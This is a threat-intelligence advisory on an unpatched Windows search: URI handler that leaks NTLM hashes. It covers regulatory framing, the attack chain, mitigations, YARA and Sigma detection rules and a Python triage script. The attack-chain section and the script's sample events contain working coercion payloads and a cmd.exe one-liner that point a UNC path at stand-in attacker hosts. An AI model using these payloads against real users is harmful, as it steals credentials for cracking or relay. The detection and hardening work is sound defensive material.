Unpatched NTLM Leakage in Windows search: URI Handler, Same Bug, No CVE, No Fix

Jeff Davies, 11 Jun 2026

1. Executive summary

A native Windows URI handler (search:) contains an unpatched NTLM credential leakage vulnerability functionally identical to the recently patched Snipping Tool flaw (CVE-2026-33829). Unlike the Snipping Tool variant, this primitive in Windows Explorer has received no CVE assignment and no vendor fix as of June 2026. Attackers can trigger automatic Net-NTLMv2 hash transmission to attacker-controlled SMB servers via a single user click on a malicious link in a browser (e.g., Microsoft Edge) or via command-line execution, enabling offline cracking or NTLM relay attacks without deploying malware. EMEA financial services relying solely on CVE-based patching metrics have a critical blind spot in their endpoint defense posture.

2. Regulatory framing

Each entry lists the article, the trigger (the fact in this item) and the practical impact.

  • DORA Art. 17
    Trigger: Existence of an unpatched ICT vulnerability (URI handler) allowing credential theft.
    Practical impact: Financial entities must update ICT-related incident management processes to detect and respond to non-CVE vulnerabilities that bypass standard patch cycles.
  • DORA Art. 18
    Trigger: The vulnerability allows classification as a cyber threat with potential major impact (credential compromise) despite lacking a CVE.
    Practical impact: Incidents stemming from this vector must be classified based on impact (hash leakage) rather than waiting for a formal CVE severity score.
  • DORA Art. 24
    Trigger: The vulnerability cannot be remediated via vendor patching; it requires compensating controls.
    Practical impact: Digital operational resilience testing must validate detection and containment capabilities for unpatched native Windows behaviors.
  • DORA Art. 28
    Trigger: Exploitation relies on standard user interaction with built-in OS components, not third-party software failure.
    Practical impact: ICT third-party risk principles apply to the inherent risk of the underlying OS provider's decision not to issue a fix.
  • NIS2 Art. 21(2)(d)
    Trigger: The attack vector exploits supply chain-adjacent trust in native OS URI handlers.
    Practical impact: Entities must implement supply chain security measures that account for vulnerabilities in the core operating system supply chain that vendors deem "below servicing bar."

Note: No specific DORA/NIS2 article regarding "major incident reporting thresholds" (Art. 19/23) is directly engaged by the mere existence of this vulnerability; reporting obligations are triggered only upon successful exploitation resulting in a significant incident.

3. Technical analysis & attack chain

The vulnerability resides in the search: URI protocol handler registered in Windows Explorer. It shares the same underlying NTLM coercion primitive as CVE-2026-33829 (Snipping Tool ms-screensketch:), but affects the search: handler which remains unpatched.

Attack Chain

  1. Initial Access: The attacker delivers a malicious hyperlink containing a crafted search: URI to a victim via phishing email, chat, or a compromised website.
    • Payload format: search:query=test&crumb=location:\\<ATTACKER_IP>\share
    • Delivery vector confirmed: Clicking the link in Microsoft Edge or executing via cmd.exe.
  2. Trigger Mechanism:
    • Browser Vector: When the user clicks the link in Edge, the browser invokes the registered search: protocol handler.
    • CLI Vector: If executed via command line, the syntax start "" "search:query=test&crumb=location:\\<ATTACKER_IP>\share" is required. The empty quotes "" prevent cmd.exe from interpreting the & character as a command separator.
  3. Vulnerability Execution: The search: handler processes the crumb=location parameter. It attempts to access the specified UNC path (\\<ATTACKER_IP>\share).
  4. Credential Leakage: Windows automatically attempts to authenticate to the remote UNC path using the current user's credentials. This triggers the transmission of the Net-NTLMv2 hash to the attacker's server.
  5. Capture: The attacker captures the hash using tools such as Responder listening on the SMB port (TCP 445).
  6. Post-Exploitation: The captured hash is used for offline password cracking or NTLM relay attacks to pivot within the network.

Technical Specifics

  • Affected Components: Windows Explorer search: URI handler.
  • Registry Keys: The handler is registered in HKCR alongside search-ms:. Both share the same DelegateExecute CLSID: {90b9bce2-b6db-4fd3-8451-35917ea1081b}.
  • Observed Behavior:
    • Upon execution, the victim sees a standard Windows error dialog: "Windows cannot access the specified device, path, or file."
    • This error dialog is misleading: it looks like a harmless failure, but the hash transmission has already occurred before the dialog renders.
    • Frequency Limitation: The leak occurs only on the first invocation per user logon session. Subsequent attempts return "Access Denied" without re-transmitting the hash until the user logs out and back in.
  • Tested Environments: Confirmed on Windows 11 23H2 Pro (Build 22631.6199) and Windows 11 25H2 (Build 26200.8524).
  • Privileges: Requires only standard user privileges; no admin rights or developer mode needed.
  • Defender Evasion: The activity utilizes built-in Windows binaries and standard SMB traffic, generating zero alerts on default Microsoft Defender configurations.

Unconfirmed Claims

  • Attribution to specific threat actors is unconfirmed; no MITRE profile matches this specific unpatched variant as a distinct campaign.
  • While search-ms: shares the same CLSID, explicit confirmation of its exploitation in the wild alongside search: is not present in the source material, though the technical parity suggests high likelihood.

4. Mitigation & containment

As no vendor patch exists, mitigation relies on configuration hardening and network controls.

P1: Immediate Containment (Within 24h)

  • Network Segmentation: Block outbound SMB (TCP 445, 139) from workstation subnets to the internet and untrusted internal zones. This prevents hash exfiltration to external attacker IPs.
  • EDR/Firewall Rules: Deploy rules to alert/block outbound SMB connections initiated by explorer.exe or browser processes to non-whitelisted internal file servers.

P2: Configuration Hardening (Within 72h)

  • Disable NTLM Outbound Authentication (High Impact): If operationally feasible, disable NTLMv1/v2 outbound authentication via Group Policy.
    • Path: Computer Configuration > Windows Settings > Security Settings > Local Policies > Security Options
    • Policy: Network security: Restrict NTLM: Outgoing NTLM traffic to remote servers -> Set to Deny all.
    • Warning: This may break legacy internal applications; test in audit mode first.
  • Protocol Handler Restriction: Investigate removing or restricting the search: protocol registration in HKCR via GPO for high-risk users, though this may impact native search functionality.

P3: Long-term Remediation (Within 7 days)

  • Monitoring Enhancement: Deploy detection rules (see Section 6) to identify the specific URI invocation patterns.
  • User Awareness: Update phishing training to highlight that "native" Windows links (not just downloads) can trigger credential theft.
  • Vendor Engagement: Monitor Microsoft Security Response Center (MSRC) for future updates regarding "below servicing bar" items.

5. Indicators of compromise

No static file hashes or malware binaries are associated with this vulnerability as it exploits native OS behavior. The primary indicators are network destinations and URI strings.

  type            value                                    confidence  source
  uri_scheme      search:                                  High        Huntress
  uri_parameter   crumb=location:                          High        Huntress
  registry_clsid  {90b9bce2-b6db-4fd3-8451-35917ea1081b}   High        Huntress

6. Detection

The following rules detect the exploitation attempt based on the unique URI structure and the resulting SMB connection pattern.

YARA Rule (String Matching on Logs/Memory)

This rule targets the specific URI pattern used in the exploit.

rule Huntress_Search_URI_Leak {
    meta:
        author = "Adverse Trace"
        date = "2026-06-11"
        reference = "https://www.huntress.com/blog/unpatched-ntlm-leak-windows-search-uri-handler"
        description = "Detects the malicious search: URI handler string used to leak NTLM hashes."
    strings:
        $uri_scheme = "search:query=" ascii wide
        $uri_crumb = "crumb=location:\\\\" ascii wide
        $unc_path = "\\\\" ascii wide
    condition:
        $uri_scheme and $uri_crumb and $unc_path
}

Sigma Rule (Process/Network Behavior)

This rule detects the execution of the search: protocol via command line or the resulting network activity.

title: Potential NTLM Leak via Windows Search URI Handler
id: at-2026-06-11-088-sigma
status: experimental
description: Detects command-line execution of a search: URI carrying a UNC crumb=location parameter, or any search: URI launched from a browser parent process. Process-creation telemetry only; pair with the outbound SMB firewall/EDR rules from Section 4 for the network side.
author: Adverse Trace
date: 2026/06/11
references:
    - https://www.huntress.com/blog/unpatched-ntlm-leak-windows-search-uri-handler
logsource:
    category: process_creation
    product: windows
detection:
    selection_cli:
        # |all requires both substrings; a bare 'search:query=' is benign on its own
        CommandLine|contains|all:
            - 'search:query='
            - 'crumb=location:\\'
    selection_browser:
        ParentImage|endswith:
            - '\msedge.exe'
            - '\chrome.exe'
            - '\firefox.exe'
        # deliberately broad; tune to your environment if browser-launched search: URIs are common
        CommandLine|contains:
            - 'search:'
    condition: selection_cli or selection_browser
fields:
    - CommandLine
    - User
    - ParentImage
level: high
tags:
    - attack.credential_access
    - attack.t1550.002
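The following triage script is an added example, not part of the Huntress or Adverse Trace material. It applies the same logic as the Sigma rule above to constructed process-creation events: it finds the search: URI in a command line, pulls the UNC host out of the crumb=location parameter (percent-decoding first, in case a browser URL-encoded the backslashes), and flags hosts that are neither RFC 1918 addresses nor on an assumed allowlist of sanctioned file servers. The allowlist, the sample command lines and the parent-image names are assumptions for illustration.

```python
import re
from ipaddress import ip_address, ip_network
from urllib.parse import unquote

# Constructed sample process-creation events (not real telemetry).
SAMPLE_EVENTS = [
    {"ParentImage": r"C:\Windows\System32\cmd.exe",
     "CommandLine": r'start "" "search:query=test&crumb=location:\\203.0.113.10\share"'},
    {"ParentImage": r"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe",
     "CommandLine": r'"C:\Windows\explorer.exe" "search:query=test&crumb=location:%5C%5Cevil.example%5Cshare"'},
    {"ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": r'"C:\Windows\explorer.exe" "search:query=invoice"'},
    {"ParentImage": r"C:\Windows\System32\cmd.exe",
     "CommandLine": r'start "" "search:query=test&crumb=location:\\fileserver01\share"'},
]

SEARCH_URI = re.compile(r"search:[^\s\"']*", re.IGNORECASE)
# crumb=location:\\<host>\<share>  -> capture <host> (stops at the next backslash, &, quote or space)
CRUMB_UNC = re.compile(r"crumb=location:\\\\([^\\&\"'\s]+)", re.IGNORECASE)

INTERNAL_NETS = [ip_network("10.0.0.0/8"), ip_network("172.16.0.0/12"), ip_network("192.168.0.0/16")]
ALLOWED_HOSTS = {"fileserver01"}  # assumed allowlist of sanctioned internal file servers


def unc_host(cmdline):
    """Return the lower-cased UNC host named in a search: URI's crumb=location, or None."""
    m = SEARCH_URI.search(cmdline)
    if not m:
        return None
    uri = unquote(m.group(0))  # undo %5C-style encoding a browser may have applied
    c = CRUMB_UNC.search(uri)
    return c.group(1).lower() if c else None


def is_external(host):
    """True when the host is neither allowlisted nor an RFC 1918 address."""
    if host in ALLOWED_HOSTS:
        return False
    try:
        return not any(ip_address(host) in net for net in INTERNAL_NETS)
    except ValueError:
        return True  # a hostname outside the allowlist is treated as untrusted


def triage(events):
    """One finding per event whose command line carries a UNC crumb=location parameter."""
    findings = []
    for e in events:
        host = unc_host(e["CommandLine"])
        if host is None:
            continue  # a search: URI without a UNC crumb does not coerce authentication
        parent = e["ParentImage"].rsplit("\\", 1)[-1].lower()
        findings.append({"host": host, "external": is_external(host), "parent": parent})
    return findings
```

Because the hash leaks on the first invocation per logon session, a single external hit is already worth an incident ticket rather than a threshold-based alert.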

7. Sources

  • Huntress, "Unpatched NTLM Leakage in Windows search: URI Handler, Same Bug, No CVE, No Fix", https://www.huntress.com/blog/unpatched-ntlm-leak-windows-search-uri-handler, 2026-06-02.
  • Huntress, "Unpatched NTLM Coercion in Windows search: URI Handler, Same Bug, No CVE, No Fix", https://www.huntress.com/blog/unpatched-ntlm-coercion-windows-search-uri-handler.

8. Adverse Trace position

Adverse Trace assesses the severity of this item as High for EMEA financial services, despite the lack of a CVE or "Critical" vendor rating. The risk is elevated because the vulnerability exists in a core Windows component (the search: handler) for which no patch is available, and it bypasses traditional patch-management KPIs. The ability to harvest Net-NTLMv2 hashes via a simple click without malware execution presents a significant initial access vector for APTs and ransomware groups. Since no fix is available, immediate implementation of network-level SMB restrictions and behavioral detection rules is mandatory. We will continue to monitor MSRC for any change in status and track exploitation attempts in the wild.

Published via PulseTrace — Adverse Trace threat intelligence.